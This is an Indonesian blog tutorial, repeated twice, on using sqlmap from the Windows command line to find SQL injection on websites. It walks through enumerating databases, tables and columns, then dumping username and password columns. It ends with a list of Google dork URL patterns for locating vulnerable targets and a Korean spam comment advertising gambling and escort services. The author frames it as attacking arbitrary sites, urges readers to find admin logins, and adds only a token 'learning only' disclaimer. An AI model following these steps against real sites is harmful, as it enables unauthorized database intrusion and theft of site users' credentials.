Hello apa kabar pasti baik semuanya pasti nya kan :) oke kali ini gue akan share Tutorial sqlmap menggunakan python di CMD
sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.
ok, langsung saja download dulu alat perang nya di bawa sini :
untuk tutorialnya :
1. download kedua file di atas, instal python taro di desktop , extrack sqlmap nya
misalkan gue extrack sqlmap di Folder Python
Perintah nya :/
Lalu Tekan ENTER :)
Nanti akan Seperti ini
Lalu Enter Saja , dan mulai lah cari target dengan masukan perintah
Jika muncul pertanyan sejenis atau serupa/sebentuk dan seperti ini
"GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]" tekan y lalu enter saja
Kalo sudah menemukan tables pada website yg vuln ketikan perintah tersebut
fungsi :
-u = url
-D = database
--tables = untuk mendapatkan tables dari database
Misalnya tables gue ini
[11 tables]
+-------------------+
| areas |
| categories |
| featured |
| fields |
| jobfields |
| member_areas |
| member_categories |
| member_fields |
| members |
| projects |
| users |
+-------------------+
sekarang kita lihat dari tabel2 tersebut kira kira user id dan password nya dimna ?
mari kita check dengan perintah:
-T = nama table
--columns = melihat columns di table
kita telah mendapat kan nama column dari tabel users
Sekarang kita akan melihat isi dari column tersebut, dalam hal ini kita cukup melihat isi dari column password dan username saja, dengan memasukan perintah :
fungsi :
-C = nama column
--dump = melihat data di column
klo ktemu nama passwrod dan unser admin nya setrah lo dah mao lo apain dah tuh dosa di tangung lo oya jangan lupa lo cari admin login nya :v
saya tidak bertanggung jawab atas apa yang lo lakukan, ini hanya untuk materi pembelajaran saja
Semoga bermanfaat, Terima kasih :)
untuk dork google nya bisa sedot disini masi fress
- cd desktop
- cd Python
- cd sqlmap
- sqlmap.py -u Masukan Target lo --dbs
Nanti akan Seperti ini
Lalu Enter Saja , dan mulai lah cari target dengan masukan perintah
- sqlmap.py -u Masukan URL target lo --dbs
Jika muncul pertanyan sejenis atau serupa/sebentuk dan seperti ini
"GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]" tekan y lalu enter saja
Kalo sudah menemukan tables pada website yg vuln ketikan perintah tersebut
- sqlmap.py -u (Masukan Taget lo) -D (nama tables target lo ) --tables [enter]
-u = url
-D = database
--tables = untuk mendapatkan tables dari database
Misalnya tables gue ini
[11 tables]
+-------------------+
| areas |
| categories |
| featured |
| fields |
| jobfields |
| member_areas |
| member_categories |
| member_fields |
| members |
| projects |
| users |
+-------------------+
sekarang kita lihat dari tabel2 tersebut kira kira user id dan password nya dimna ?
mari kita check dengan perintah:
- sqlmap.py -u (Masukan Taget lo) -D (nama tables target lo ) -T (nama columns target lo) --columns [enter]
-T = nama table
--columns = melihat columns di table
kita telah mendapat kan nama column dari tabel users
Sekarang kita akan melihat isi dari column tersebut, dalam hal ini kita cukup melihat isi dari column password dan username saja, dengan memasukan perintah :
- sqlmap.py -u (Masukan Taget lo) -D (nama tables target lo ) -T (nama columns target lo) -C password,username --dump
fungsi :
-C = nama column
--dump = melihat data di column
klo ktemu nama passwrod dan unser admin nya setrah lo dah mao lo apain dah tuh dosa di tangung lo oya jangan lupa lo cari admin login nya :v
saya tidak bertanggung jawab atas apa yang lo lakukan, ini hanya untuk materi pembelajaran saja
Semoga bermanfaat, Terima kasih :)
untuk dork google nya bisa sedot disini masi fress
- about.php?cartID=
- accinfo.php?cartId=
- acclogin.php?cartID=
- add.php?bookid=
- add_cart.php?num=
- addcart.php?
- addItem.php
- add-to-cart.php?ID=
- addToCart.php?idProduct=
- addtomylist.php?ProdId=
- adminEditProductFields.php?intProdID=
- advSearch_h.php?idCategory=
- affiliate.php?ID=
- affiliate-agreement.cfm?storeid=
- affiliates.php?id=
- ancillary.php?ID=
- archive.php?id=
- article.php?id=
- phpx?PageID
- basket.php?id=
- Book.php?bookID=
- book_list.php?bookid=
1 comment
Casinocanada Casino - DrmCD
› gambling › gambling Jun 24, 2017 — Jun 제주 출장샵 24, 2017 Casinocanada 충청남도 출장샵 Casino · 1. 전주 출장샵 Casino · 2. Casino · 동두천 출장마사지 3. Casino · 4. Casino · 5. Casino · 6. Casino · 7. Casino · 8. Casino 김제 출장안마 · 9.
Posting Komentar